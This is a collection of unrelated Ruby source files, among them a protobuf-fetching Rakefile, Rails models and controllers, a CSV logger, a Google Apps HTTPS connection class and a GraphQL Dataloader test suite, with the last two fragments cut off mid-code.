require_relative "brightbox-cli/nilable_hash"
require_relative "brightbox-cli/error_parser"
require_relative "brightbox-cli/gli_global_hooks"
|
require 'open-uri'
require 'fileutils'
PROTOBUF_DEPS_DIR="./.protobuf"
PROTOBUF_OUT_DIR="./Sources/Tenderswift/TendermintTypes"
TENDERMINT_PROTOBUF="TendermintTypes.proto"
task default: :build_protobuf
desc "Download and properly extracts required protobuf dependency definitions"
task :get_protobuf_deps do
FileUtils.mkdir_p(PROTOBUF_DEPS_DIR)
get_protobuf_dependency("gogo/protobuf",
version: "v1.2.1",
dest_dir: PROTOBUF_DEPS_DIR,
include_paths: {
"gogoproto" => "github.com/gogo/protobuf/gogoproto",
"protobuf/google/protobuf" => "google/protobuf"
}
)
get_protobuf_dependency("tendermint/tendermint",
version: "master",
dest_dir: PROTOBUF_DEPS_DIR,
include_paths: {
"crypto/merkle" => "github.com/tendermint/tendermint/crypto/merkle",
"libs/common" => "github.com/tendermint/tendermint/libs/common",
"abci/types" => ""
}
)
sh "mv #{File.join(PROTOBUF_DEPS_DIR, 'types.proto')} #{File.join(PROTOBUF_DEPS_DIR, TENDERMINT_PROTOBUF)}"
end
task :clean_protobuf_deps do
FileUtils.rm_rf(PROTOBUF_DEPS_DIR)
end
task :install_swift_protobuf do
# TODO Add support for Linux
sh "brew install swift-protobuf"
end
desc "Builds Tendermint ABCI types from protobuf definitions"
task build_protobuf: [:get_protobuf_deps] do
build_all_protobuf
generate_xcode_project
end
#
# Local utility functions
#
def generate_xcode_project
sh "swift package generate-xcodeproj"
end
def build_all_protobuf
FileUtils.mkdir_p(PROTOBUF_OUT_DIR)
include_dir = "-I=#{PROTOBUF_DEPS_DIR} " + Dir.glob("#{PROTOBUF_DEPS_DIR}/**/*/").join(" -I=")
Dir.glob("#{PROTOBUF_DEPS_DIR}/**/*.proto").each do |file|
sh "protoc #{include_dir} --swift_out=#{PROTOBUF_OUT_DIR} #{file}"
end
end
def get_protobuf_dependency(repo, version:, dest_dir:"./", include_paths:{})
local_file_path = download_repository(repo, version: version, dest_dir: dest_dir)
extraction_dir = extract_archive(local_file_path, dest_dir)
include_paths.each do |path, import_path|
dep_import_dir = File.join(dest_dir, import_path)
FileUtils.mkdir_p(dep_import_dir)
sh "cp #{File.join(extraction_dir, path, '*.proto')} #{dep_import_dir}"
end
FileUtils.rm_rf(extraction_dir)
FileUtils.rm_rf(local_file_path)
end
def download_repository(repo, version:, dest_dir:"./")
file_name_suffix = "#{version}.tar.gz"
file_name = "#{repo.gsub('/', '_')}_#{file_name_suffix}"
local_file_path = File.join(dest_dir, file_name)
archive_url = "https://github.com/#{repo}/archive/#{file_name_suffix}"
puts "Downloading '#{archive_url}' to '#{local_file_path}' ..."
File.write(local_file_path, open(archive_url).read)
local_file_path
end
def extract_archive(archive_file_path, dest_dir)
extract_dir = File.basename(archive_file_path).gsub(".tar.gz", "")
dest_dir = File.join(dest_dir, extract_dir)
FileUtils.mkdir_p(dest_dir)
sh "tar -C #{dest_dir} --strip-components=1 -xvzf #{archive_file_path}"
dest_dir
end
|
class Filo < ActiveRecord::Base
has_many :clases
has_many :exemplares
attr_accessible :descricao, :status
self.per_page = 10
scope :busca, joins(:clases).order("filos.descricao")
validates_presence_of :descricao, :message =>" - Deve ser preenchido"
validates_uniqueness_of :descricao, :message =>" - Já existente"
end
|
require 'csv'
class Personal_Log
def initialize(filename)
@filename = "#{Rails.root}/lib/#{filename}"
if file_dir_or_symlink_exists?(@filename)
readFile
else
f = File.new(@filename, "w")
f.close
readFile
end
end
private
def writeFile
CSV.open(@filename, "w") do |csv|
@fileContent.each do |p|
csv << p
end
end
end
private
def readFile
@fileContent = CSV.read(@filename)
end
public
def findRecord(position, searchTerm)
#holder = @fileContent.find {|row| row[position] == '#{searchTerm}'}
holder = @fileContent.find{|person| person[position] =~/#{searchTerm}/}
#puts holder.class
return holder
end
private
def findAllRecords
end
public
def updateRecord(position, searchTerm, newText)
holder = @fileContent.find{|person| person[position] =~/#{searchTerm}/}
#p @fileContent
holder[position] = newText
# call the writeFile method, this will write all changes back to the text.txt file
writeFile
end
public
def newRecord(email, town, firstname, lastname, mobile)
# add code here to add a new record
array = Array.new
array.push email
array.push town
array.push firstname
array.push lastname
array.push mobile
CSV.open(@filename, "a+") do |csv|
csv << array
end
end
public
def recordSearch(email, name_search, category_id, date)
array = Array.new
array.push email
array.push name_search
array.push category_id
array.push date
CSV.open(@filename, "a+") do |csv|
csv << array
end
end
def newLogRecord(arr)
CSV.open(@filename, "a+") do |csv|
csv << arr
end
end
public
# method to remove a line from the csv file. position is the data item in the csv row.
def deleteRecord(position, searchTerm)
# add code here to delete a line from the csv file
readFile # call the method to read the content of the file
holder = @fileContent.find{|person| person[position] =~/#{searchTerm}/} # locate the record in the csv file
@fileContent.delete(holder) # remove the identified record from the @fileContent array
writeFile # write the content of @fileContent array back to the csv file
end
public
def deleteRecordByIndex(pos)
# add code here to delete a line at a specific row from the csv file
readFile # call the method to read the content of the file
@fileContent.delete_at(pos) # remove the identified record from the @fileContent array
writeFile # write the content of @fileContent array back to the csv file
end
private
def file_dir_or_symlink_exists?(path_to_file)
File.exist?(path_to_file) || File.symlink?(path_to_file)
end
end
#p = EmployeeLogger.new("text2.txt")
#t = p.findRecord(0, 'jon@email.com')
#p.updateRecord(1, "Legend", "Cool")
#p.deleteRecord(2,"Johnny")
#p.newRecord("jon@email.com", "Naas", "Johnny", "McCarthy", "0834342009")
#p.deleteRecordByIndex(3) |
module EmailHelper
include Rails.application.routes.url_helpers
include ActionView::Helpers::UrlHelper
def user_url user
link_to "#{ENV['ZHISHi_URL']}/users/#{user.zhishi_id}", user.zhishi_name
end
end
|
class Manager::TaskTagSerializer < ActiveModel::Serializer
attributes :id, :text, :taggings_count
def text
object.name
end
end
|
class GameDisplay
attr_reader :rows,
:display_positions
def initialize
@header = '.A B C D'
@rows = ['1 ',\
'2 ',\
'3 ',\
'4 ']
@display_positions = {a1:[0, 1], b1:[0, 3], c1:[0, 5], d1:[0, 7],\
a2:[1, 1], b2:[1, 3], c2:[1, 5], d2:[1, 7],\
a3:[2, 1], b3:[2, 3], c3:[2, 5], d3:[2, 7],\
a4:[3, 1], b4:[3, 3], c4:[3, 5], d4:[3, 7]}
end
def print_to_screen
puts @header
puts @rows[0]
puts @rows[1]
puts @rows[2]
puts @rows[3]
end
end
|
class Group < ActiveRecord::Base
belongs_to :speciality
has_many :students
has_many :examinations
has_many :active_examinations, -> { where active: true }, class_name: 'Examination'
has_many :inactive_examinations, -> { where active: false }, class_name: 'Examination'
has_many :active_students, -> { where active: true }, class_name: 'Student'
has_many :inactive_students, -> { where active: false }, class_name: 'Student'
validates :title, presence: true
validates :year, presence: true
validates :speciality_id, presence: true
default_scope { order('priority DESC') }
scope :all_active, -> { where(active: true) }
end
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
require 'net/https'
require 'cgi'
module GAppsProvisioning #:nodoc:
class Connection
attr_reader :http_connection
# Establishes SSL connection to Google host
def initialize(host, port, proxy=nil, proxy_port=nil, proxy_user=nil, proxy_passwd=nil)
conn = Net::HTTP.new(host, port, proxy, proxy_port, proxy_user, proxy_passwd)
conn.use_ssl = true
#conn.enable_post_connection_check= true
conn.verify_mode = OpenSSL::SSL::VERIFY_PEER
#conn.verify_mode = OpenSSL::SSL::VERIFY_NONE
# uncomment the previous line at your own risk : the certificate won't be verified !
store = OpenSSL::X509::Store.new
store.set_default_paths
conn.cert_store = store
conn.start
@http_connection = conn
end
# Performs the http request and returns the http response
def perform(method, path, body=nil, header=nil)
req = Net::HTTPGenericRequest.new(method, !body.nil?, true, path)
req['Content-Type'] = header['Content-Type'] if header['Content-Type']
req['Authorization'] = header['Authorization'] if header['Authorization']
req['Content-length'] = body.length.to_s if body
resp = @http_connection.request(req, body)
return resp
end
end
end |
class AdminsessionsController < ApplicationController
before_action :set_adminsession, only: [:show, :edit, :update, :destroy]
before_action :authenticate_admin!
# GET /adminsessions
# GET /adminsessions.json
def index
@adminsessions = Adminsession.all
end
# GET /adminsessions/1
# GET /adminsessions/1.json
def show
end
# GET /adminsessions/new
def new
@adminsession = Adminsession.new
end
# GET /adminsessions/1/edit
def edit
end
# POST /adminsessions
# POST /adminsessions.json
def create
@adminsession = Adminsession.new(adminsession_params)
respond_to do |format|
if @adminsession.save
format.html { redirect_to @adminsession, notice: 'Adminsession was successfully created.' }
format.json { render :show, status: :created, location: @adminsession }
else
format.html { render :new }
format.json { render json: @adminsession.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /adminsessions/1
# PATCH/PUT /adminsessions/1.json
def update
respond_to do |format|
if @adminsession.update(adminsession_params)
format.html { redirect_to @adminsession, notice: 'Adminsession was successfully updated.' }
format.json { render :show, status: :ok, location: @adminsession }
else
format.html { render :edit }
format.json { render json: @adminsession.errors, status: :unprocessable_entity }
end
end
end
# DELETE /adminsessions/1
# DELETE /adminsessions/1.json
def destroy
@adminsession.destroy
respond_to do |format|
format.html { redirect_to adminsessions_url, notice: 'Adminsession was successfully destroyed.' }
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_adminsession
@adminsession = Adminsession.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def adminsession_params
params.require(:adminsession).permit(:username, :startdatetime, :enddatetime, :ip)
end
end
|
class FakeStdout
attr_accessor :calls
def initialize
@calls = []
@string = ""
end
def method_missing(method, *args)
@calls << {method: method, args: args}
end
def write(str)
@string += str
method_missing(:write, strs)
end
def to_s
return "" if @calls.empty?
@string
# @calls.join("\n")
end
end
module TryRuby
Line, Past_commands, current_includes = ARGV
def current_includes
current_includes
end
def current_includes<<(item)
current_includes << item
end
end
ARGV = []
poem = <<POEM_EOF
My toast has flown from my hand
And my toast has gone to the
moon.
But when I saw it on television,
Planting our flag on Halley's
comet,
More still did I want to eat it.
POEM_EOF
#def require(path)
# result = ''
# path = path.sub(/\.rb$/, "")
# return false unless ['popup'].include?(path)
# if Object.tryruby_current_includes.include?(path)
# Thread.new do
#
# end.join
# else
# Thread.new do
# result = File.read(path)
# Object.tryruby_current_includes << path
# end.join
# end
# true
#end
def require(require_path)
result = false
Thread.new do
path = require_path.sub(/\.rb$/, "")
if ['popup'].include?(path) and !TryRuby::Current_includes.include?(path)
TryRuby::Current_includes << path
result = true
end
end.join
result
end
$stdout = FakeStdout.new
eval( <<EOF
$SAFE=3 |
class Token < ActiveRecord::Base
belongs_to :formulario
validates_uniqueness_of :desc_token
end
|
class Story < ActiveRecord::Base
has_one :lead_item, class_name: 'Item'
belongs_to :author, class_name: 'User'
end
class Item < ActiveRecord::Base
belongs_to :story
end
class User < ActiveRecord::Base
has_many :stories
end |
class Post < ApplicationRecord
belongs_to :user
validates :subject, presence: true, length: { minimum: 1, maximum: 50 }
validates :body, presence: true, length: { minimum: 1, maximum: 2000 }
end
|
Factory.define(:car) do |f|
f.model { fake(:company, :name) }
f.mark { fake(:company, :name) }
f.vin { fake(:lorem, :word) }
f.production_year { Date.current - 10.years }
f.association(:user)
end
|
class S3ManifestAbility
include CanCan::Ability
def initialize
can :read, :all
end
end
|
class UsersController < ApplicationController
def login
return unless params[:username]
authenticator = Rails.env.production? ? SimpleLDAP : SimpleLDAP::Stub
data = authenticator.authenticate(params[:username], params[:password], 'ldap.stuba.sk', 389, 'ou=People,dc=stuba,dc=sk')
if data.nil?
flash[:error] = t(:login_error)
else
user = User.find_or_create_by_username(:username => params[:username], :name => data['cn'].first)
session[:user_id] = user.id
cookies[:token] = {:value => user.token, :expires => 1.month.from_now}
flash[:notice] = t(:login_successful)
end
redirect_to :back
end
def logout
flash[:notice] = t(:logout)
cookies.delete :token
session[:user_id] = nil
redirect_to Page.root.get_path unless Page.root.nil?
redirect_to "/" if Page.root.nil?
end
end
|
# frozen_string_literal: true
require "spec_helper"
require "fiber"
describe GraphQL::Dataloader do
class BatchedCallsCounter
def initialize
@count = 0
end
def increment
@count += 1
end
attr_reader :count
end
class FiberSchema < GraphQL::Schema
module Database
extend self
DATA = {}
[
{ id: "1", name: "Wheat", type: "Grain" },
{ id: "2", name: "Corn", type: "Grain" },
{ id: "3", name: "Butter", type: "Dairy" },
{ id: "4", name: "Baking Soda", type: "LeaveningAgent" },
{ id: "5", name: "Cornbread", type: "Recipe", ingredient_ids: ["1", "2", "3", "4"] },
{ id: "6", name: "Grits", type: "Recipe", ingredient_ids: ["2", "3", "7"] },
{ id: "7", name: "Cheese", type: "Dairy" },
].each { |d| DATA[d[:id]] = d }
def log
@log ||= []
end
def mget(ids)
log << [:mget, ids.sort]
ids.map { |id| DATA[id] }
end
def find_by(attribute, values)
log << [:find_by, attribute, values.sort]
values.map { |v| DATA.each_value.find { |dv| dv[attribute] == v } }
end
end
class DataObject < GraphQL::Dataloader::Source
def initialize(column = :id)
@column = column
end
def fetch(keys)
if @column == :id
Database.mget(keys)
else
Database.find_by(@column, keys)
end
end
end
class NestedDataObject < GraphQL::Dataloader::Source
def fetch(ids)
@dataloader.with(DataObject).load_all(ids)
end
end
class SlowDataObject < GraphQL::Dataloader::Source
def initialize(batch_key)
# This is just so that I can force different instances in test
@batch_key = batch_key
end
def fetch(keys)
t = Thread.new {
sleep 0.5
Database.mget(keys)
}
dataloader.yield
t.value
end
end
class CustomBatchKeySource < GraphQL::Dataloader::Source
def initialize(batch_key)
@batch_key = batch_key
end
def self.batch_key_for(batch_key)
Database.log << [:batch_key_for, batch_key]
# Ignore it altogether
:all_the_same
end
def fetch(keys)
Database.mget(keys)
end
end
class KeywordArgumentSource < GraphQL::Dataloader::Source
def initialize(column:)
@column = column
end
def fetch(keys)
if @column == :id
Database.mget(keys)
else
Database.find_by(@column, keys)
end
end
end
class AuthorizedSource < GraphQL::Dataloader::Source
def initialize(counter)
@counter = counter
end
def fetch(recipes)
@counter && @counter.increment
recipes.map { true }
end
end
module Ingredient
include GraphQL::Schema::Interface
field :name, String, null: false
field :id, ID, null: false
field :name_by_scoped_context, String
def name_by_scoped_context
context[:ingredient_name]
end
end
class Grain < GraphQL::Schema::Object
implements Ingredient
end
class LeaveningAgent < GraphQL::Schema::Object
implements Ingredient
end
class Dairy < GraphQL::Schema::Object
implements Ingredient
end
class Recipe < GraphQL::Schema::Object
def self.authorized?(obj, ctx)
ctx.dataloader.with(AuthorizedSource, ctx[:batched_calls_counter]).load(obj)
end
field :name, String, null: false
field :ingredients, [Ingredient], null: false
def ingredients
ingredients = dataloader.with(DataObject).load_all(object[:ingredient_ids])
ingredients
end
field :slow_ingredients, [Ingredient], null: false
def slow_ingredients
# Use `object[:id]` here to force two different instances of the loader in the test
dataloader.with(SlowDataObject, object[:id]).load_all(object[:ingredient_ids])
end
end
class Query < GraphQL::Schema::Object
field :recipes, [Recipe], null: false
def recipes
Database.mget(["5", "6"])
end
field :ingredient, Ingredient do
argument :id, ID
end
def ingredient(id:)
dataloader.with(DataObject).load(id)
end
field :ingredient_by_name, Ingredient do
argument :name, String
end
def ingredient_by_name(name:)
ing = dataloader.with(DataObject, :name).load(name)
context.scoped_set!(:ingredient_name, "Scoped:#{name}")
ing
end
field :nested_ingredient, Ingredient do
argument :id, ID
end
def nested_ingredient(id:)
dataloader.with(NestedDataObject).load(id)
end
field :slow_recipe, Recipe do
argument :id, ID
end
def slow_recipe(id:)
dataloader.with(SlowDataObject, id).load(id)
end
field :recipe, Recipe do
argument :id, ID, loads: Recipe, as: :recipe
end
def recipe(recipe:)
recipe
end
field :key_ingredient, Ingredient do
argument :id, ID
end
def key_ingredient(id:)
dataloader.with(KeywordArgumentSource, column: :id).load(id)
end
class RecipeIngredientInput < GraphQL::Schema::InputObject
argument :id, ID
argument :ingredient_number, Int
end
field :recipe_ingredient, Ingredient do
argument :recipe, RecipeIngredientInput
end
def recipe_ingredient(recipe:)
recipe_object = dataloader.with(DataObject).load(recipe[:id])
ingredient_idx = recipe[:ingredient_number] - 1
ingredient_id = recipe_object[:ingredient_ids][ingredient_idx]
dataloader.with(DataObject).load(ingredient_id)
end
field :common_ingredients, [Ingredient] do
argument :recipe_1_id, ID
argument :recipe_2_id, ID
end
def common_ingredients(recipe_1_id:, recipe_2_id:)
req1 = dataloader.with(DataObject).request(recipe_1_id)
req2 = dataloader.with(DataObject).request(recipe_2_id)
recipe1 = req1.load
recipe2 = req2.load
common_ids = recipe1[:ingredient_ids] & recipe2[:ingredient_ids]
dataloader.with(DataObject).load_all(common_ids)
end
field :common_ingredients_with_load, [Ingredient], null: false do
argument :recipe_1_id, ID, loads: Recipe
argument :recipe_2_id, ID, loads: Recipe
end
def common_ingredients_with_load(recipe_1:, recipe_2:)
common_ids = recipe_1[:ingredient_ids] & recipe_2[:ingredient_ids]
dataloader.with(DataObject).load_all(common_ids)
end
field :common_ingredients_from_input_object, [Ingredient], null: false do
class CommonIngredientsInput < GraphQL::Schema::InputObject
argument :recipe_1_id, ID, loads: Recipe
argument :recipe_2_id, ID, loads: Recipe
end
argument :input, CommonIngredientsInput
end
def common_ingredients_from_input_object(input:)
recipe_1 = input[:recipe_1]
recipe_2 = input[:recipe_2]
common_ids = recipe_1[:ingredient_ids] & recipe_2[:ingredient_ids]
dataloader.with(DataObject).load_all(common_ids)
end
field :ingredient_with_custom_batch_key, Ingredient do
argument :id, ID
argument :batch_key, String
end
def ingredient_with_custom_batch_key(id:, batch_key:)
dataloader.with(CustomBatchKeySource, batch_key).load(id)
end
field :recursive_ingredient_name, String do
argument :id, ID
end
def recursive_ingredient_name(id:)
res = context.schema.execute("{ ingredient(id: #{id}) { name } }")
res["data"]["ingredient"]["name"]
end
end
query(Query)
class Mutation1 < GraphQL::Schema::Mutation
argument :argument_1, String, prepare: ->(val, ctx) {
raise FieldTestError
}
def resolve(argument_1:)
argument_1
end
end
class Mutation2 < GraphQL::Schema::Mutation
argument :argument_2, String, prepare: ->(val, ctx) {
raise FieldTestError
}
def resolve(argument_2:)
argument_2
end
end
class Mutation3 < GraphQL::Schema::Mutation
argument :label, String
type String
def resolve(label:)
log = context[:mutation_log] ||= []
log << "begin #{label}"
dataloader.with(DataObject).load(1)
log << "end #{label}"
label
end
end
class Mutation < GraphQL::Schema::Object
field :mutation_1, mutation: Mutation1
field :mutation_2, mutation: Mutation2
field :mutation_3, mutation: Mutation3
end
mutation(Mutation)
def self.object_from_id(id, ctx)
if ctx[:use_request]
ctx.dataloader.with(DataObject).request(id)
else
ctx.dataloader.with(DataObject).load(id)
end
end
def self.resolve_type(type, obj, ctx)
get_type(obj[:type])
end
orphan_types(Grain, Dairy, Recipe, LeaveningAgent)
use GraphQL::Dataloader
class FieldTestError < StandardError; end
rescue_from(FieldTestError) do |err, obj, args, ctx, field|
errs = ctx[:errors] ||= []
errs << "FieldTestError @ #{ctx[:current_path]}, #{field.path} / #{ctx[:current_field].path}"
nil
end
end
class UsageAnalyzer < GraphQL::Analysis::AST::Analyzer
def initialize(query)
@query = query
@fields = Set.new
end
def on_enter_field(node, parent, visitor)
args = @query.arguments_for(node, visitor.field_definition)
# This bug has been around for a while,
# see https://github.com/rmosolgo/graphql-ruby/issues/3321
if args.is_a?(GraphQL::Execution::Lazy)
args = args.value
end
@fields << [node.name, args.keys]
end
def result
@fields
end
end
def database_log
FiberSchema::Database.log
end
before do
database_log.clear
end
module DataloaderAssertions
def self.included(child_class)
child_class.class_eval do
it "Works with request(...)" do
res = schema.execute <<-GRAPHQL
{
commonIngredients(recipe1Id: 5, recipe2Id: 6) {
name
}
}
GRAPHQL
expected_data = {
"data" => {
"commonIngredients" => [
{ "name" => "Corn" },
{ "name" => "Butter" },
]
}
}
assert_equal expected_data, res
assert_equal [[:mget, ["5", "6"]], [:mget, ["2", "3"]]], database_log
end
it "runs mutations sequentially" do
res = schema.execute <<-GRAPHQL
mutation {
first: mutation3(label: "first")
second: mutation3(label: "second")
}
GRAPHQL
assert_equal({ "first" => "first", "second" => "second" }, res["data"])
assert_equal ["begin first", "end first", "begin second", "end second"], res.context[:mutation_log]
end
it "batch-loads" do
res = schema.execute <<-GRAPHQL
{
i1: ingredient(id: 1) { id name }
i2: ingredient(id: 2) { name }
r1: recipe(id: 5) {
# This loads Ingredients 3 and 4
ingredients { name }
}
# This loads Ingredient 7
ri1: recipeIngredient(recipe: { id: 6, ingredientNumber: 3 }) {
name
}
}
GRAPHQL
expected_data = {
"i1" => { "id" => "1", "name" => "Wheat" },
"i2" => { "name" => "Corn" },
"r1" => {
"ingredients" => [
{ "name" => "Wheat" },
{ "name" => "Corn" },
{ "name" => "Butter" },
{ "name" => "Baking Soda" },
],
},
"ri1" => {
"name" => "Cheese",
},
}
assert_equal(expected_data, res["data"])
expected_log = [
[:mget, [
"1", "2", # The first 2 ingredients
"5", # The first recipe
"6", # recipeIngredient recipeId
]],
[:mget, [
"7", # recipeIngredient ingredient_id
]],
[:mget, [
"3", "4", # The two unfetched ingredients the first recipe
]],
]
assert_equal expected_log, database_log
end
it "caches and batch-loads across a multiplex" do
context = {}
result = schema.multiplex([
{ query: "{ i1: ingredient(id: 1) { name } i2: ingredient(id: 2) { name } }", },
{ query: "{ i2: ingredient(id: 2) { name } r1: recipe(id: 5) { ingredients { name } } }", },
{ query: "{ i1: ingredient(id: 1) { name } ri1: recipeIngredient(recipe: { id: 5, ingredientNumber: 2 }) { name } }", },
], context: context)
expected_result = [
{"data"=>{"i1"=>{"name"=>"Wheat"}, "i2"=>{"name"=>"Corn"}}},
{"data"=>{"i2"=>{"name"=>"Corn"}, "r1"=>{"ingredients"=>[{"name"=>"Wheat"}, {"name"=>"Corn"}, {"name"=>"Butter"}, {"name"=>"Baking Soda"}]}}},
{"data"=>{"i1"=>{"name"=>"Wheat"}, "ri1"=>{"name"=>"Corn"}}},
]
assert_equal expected_result, result
expected_log = [
[:mget, ["1", "2", "5"]],
[:mget, ["3", "4"]],
]
assert_equal expected_log, database_log
end
it "works with calls within sources" do
res = schema.execute <<-GRAPHQL
{
i1: nestedIngredient(id: 1) { name }
i2: nestedIngredient(id: 2) { name }
}
GRAPHQL
expected_data = { "i1" => { "name" => "Wheat" }, "i2" => { "name" => "Corn" } }
assert_equal expected_data, res["data"]
assert_equal [[:mget, ["1", "2"]]], database_log
end
it "works with batch parameters" do
res = schema.execute <<-GRAPHQL
{
i1: ingredientByName(name: "Butter") { id }
i2: ingredientByName(name: "Corn") { id }
i3: ingredientByName(name: "Gummi Bears") { id }
}
GRAPHQL
expected_data = {
"i1" => { "id" => "3" },
"i2" => { "id" => "2" },
"i3" => nil,
}
assert_equal expected_data, res["data"]
assert_equal [[:find_by, :name, ["Butter", "Corn", "Gummi Bears"]]], database_log
end
it "works with manual parallelism" do
start = Time.now.to_f
schema.execute <<-GRAPHQL
{
i1: slowRecipe(id: 5) { slowIngredients { name } }
i2: slowRecipe(id: 6) { slowIngredients { name } }
}
GRAPHQL
finish = Time.now.to_f
# Each load slept for 0.5 second, so sequentially, this would have been 2s sequentially
assert_in_delta 1, finish - start, 0.1, "Load threads are executed in parallel"
expected_log = [
# These were separated because of different recipe IDs:
[:mget, ["5"]],
[:mget, ["6"]],
# These were cached separately because of different recipe IDs:
[:mget, ["2", "3", "7"]],
[:mget, ["1", "2", "3", "4"]],
]
# Sort them because threads may have returned in slightly different order
assert_equal expected_log.sort, database_log.sort
end
it "Works with multiple-field selections and __typename" do
query_str = <<-GRAPHQL
{
ingredient(id: 1) {
__typename
name
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"ingredient" => {
"__typename" => "Grain",
"name" => "Wheat",
}
}
assert_equal expected_data, res["data"]
end
it "Works when the parent field didn't yield" do
query_str = <<-GRAPHQL
{
recipes {
ingredients {
name
}
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"recipes" =>[
{ "ingredients" => [
{"name"=>"Wheat"},
{"name"=>"Corn"},
{"name"=>"Butter"},
{"name"=>"Baking Soda"}
]},
{ "ingredients" => [
{"name"=>"Corn"},
{"name"=>"Butter"},
{"name"=>"Cheese"}
]},
]
}
assert_equal expected_data, res["data"]
expected_log = [
[:mget, ["5", "6"]],
[:mget, ["1", "2", "3", "4", "7"]],
]
assert_equal expected_log, database_log
end
it "loads arguments in batches, even with request" do
query_str = <<-GRAPHQL
{
commonIngredientsWithLoad(recipe1Id: 5, recipe2Id: 6) {
name
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"commonIngredientsWithLoad" => [
{"name"=>"Corn"},
{"name"=>"Butter"},
]
}
assert_equal expected_data, res["data"]
expected_log = [
[:mget, ["5", "6"]],
[:mget, ["2", "3"]],
]
assert_equal expected_log, database_log
# Run the same test, but using `.request` from object_from_id
database_log.clear
res2 = schema.execute(query_str, context: { use_request: true })
assert_equal expected_data, res2["data"]
assert_equal expected_log, database_log
end
it "works with sources that use keyword arguments in the initializer" do
query_str = <<-GRAPHQL
{
keyIngredient(id: 1) {
__typename
name
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"keyIngredient" => {
"__typename" => "Grain",
"name" => "Wheat",
}
}
assert_equal expected_data, res["data"]
end
it "Works with analyzing arguments with `loads:`, even with .request" do
query_str = <<-GRAPHQL
{
commonIngredientsWithLoad(recipe1Id: 5, recipe2Id: 6) {
name
}
}
GRAPHQL
query = GraphQL::Query.new(schema, query_str)
results = GraphQL::Analysis::AST.analyze_query(query, [UsageAnalyzer])
expected_results = [
["commonIngredientsWithLoad", [:recipe_1, :recipe_2]],
["name", []],
]
assert_equal expected_results, results.first.to_a
query2 = GraphQL::Query.new(schema, query_str, context: { use_request: true })
result2 = nil
query2.context.dataloader.run_isolated do
result2 = GraphQL::Analysis::AST.analyze_query(query2, [UsageAnalyzer])
end
assert_equal expected_results, result2.first.to_a
end
it "Works with input objects, load and request" do
query_str = <<-GRAPHQL
{
commonIngredientsFromInputObject(input: { recipe1Id: 5, recipe2Id: 6 }) {
name
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"commonIngredientsFromInputObject" => [
{"name"=>"Corn"},
{"name"=>"Butter"},
]
}
assert_equal expected_data, res["data"]
expected_log = [
[:mget, ["5", "6"]],
[:mget, ["2", "3"]],
]
assert_equal expected_log, database_log
# Run the same test, but using `.request` from object_from_id
database_log.clear
res2 = schema.execute(query_str, context: { use_request: true })
assert_equal expected_data, res2["data"]
assert_equal expected_log, database_log
end
it "batches calls in .authorized?" do
query_str = "{ r1: recipe(id: 5) { name } r2: recipe(id: 6) { name } }"
context = { batched_calls_counter: BatchedCallsCounter.new }
schema.execute(query_str, context: context)
assert_equal 1, context[:batched_calls_counter].count
query_str = "{ recipes { name } }"
context = { batched_calls_counter: BatchedCallsCounter.new }
schema.execute(query_str, context: context)
assert_equal 1, context[:batched_calls_counter].count
end
it "Works with input objects using variables, load and request" do
query_str = <<-GRAPHQL
query($input: CommonIngredientsInput!) {
commonIngredientsFromInputObject(input: $input) {
name
}
}
GRAPHQL
res = schema.execute(query_str, variables: { input: { recipe1Id: 5, recipe2Id: 6 }})
expected_data = {
"commonIngredientsFromInputObject" => [
{"name"=>"Corn"},
{"name"=>"Butter"},
]
}
assert_equal expected_data, res["data"]
expected_log = [
[:mget, ["5", "6"]],
[:mget, ["2", "3"]],
]
assert_equal expected_log, database_log
# Run the same test, but using `.request` from object_from_id
database_log.clear
res2 = schema.execute(query_str, context: { use_request: true }, variables: { input: { recipe1Id: 5, recipe2Id: 6 }})
assert_equal expected_data, res2["data"]
assert_equal expected_log, database_log
end
it "supports general usage" do
a = b = c = nil
res = GraphQL::Dataloader.with_dataloading { |dataloader|
dataloader.append_job {
a = dataloader.with(FiberSchema::DataObject).load("1")
}
dataloader.append_job {
b = dataloader.with(FiberSchema::DataObject).load("1")
}
dataloader.append_job {
r1 = dataloader.with(FiberSchema::DataObject).request("2")
r2 = dataloader.with(FiberSchema::DataObject).request("3")
c = [
r1.load,
r2.load
]
}
:finished
}
assert_equal :finished, res
assert_equal [[:mget, ["1", "2", "3"]]], database_log
assert_equal "Wheat", a[:name]
assert_equal "Wheat", b[:name]
assert_equal ["Corn", "Butter"], c.map { |d| d[:name] }
end
it "works with scoped context" do
query_str = <<-GRAPHQL
{
i1: ingredientByName(name: "Corn") { nameByScopedContext }
i2: ingredientByName(name: "Wheat") { nameByScopedContext }
i3: ingredientByName(name: "Butter") { nameByScopedContext }
}
GRAPHQL
expected_data = {
"i1" => { "nameByScopedContext" => "Scoped:Corn" },
"i2" => { "nameByScopedContext" => "Scoped:Wheat" },
"i3" => { "nameByScopedContext" => "Scoped:Butter" },
}
result = schema.execute(query_str)
assert_equal expected_data, result["data"]
end
it "works when the schema calls itself" do
result = schema.execute("{ recursiveIngredientName(id: 1) }")
assert_equal "Wheat", result["data"]["recursiveIngredientName"]
end
it "uses .batch_key_for in source classes" do
query_str = <<-GRAPHQL
{
i1: ingredientWithCustomBatchKey(id: 1, batchKey: "abc") { name }
i2: ingredientWithCustomBatchKey(id: 2, batchKey: "def") { name }
i3: ingredientWithCustomBatchKey(id: 3, batchKey: "ghi") { name }
}
GRAPHQL
res = schema.execute(query_str)
expected_data = { "i1" => { "name" => "Wheat" }, "i2" => { "name" => "Corn" }, "i3" => { "name" => "Butter" } }
assert_equal expected_data, res["data"]
expected_log = [
# Each batch key is given to the source class:
[:batch_key_for, "abc"],
[:batch_key_for, "def"],
[:batch_key_for, "ghi"],
# But since they return the same value,
# all keys are fetched in the same call:
[:mget, ["1", "2", "3"]]
]
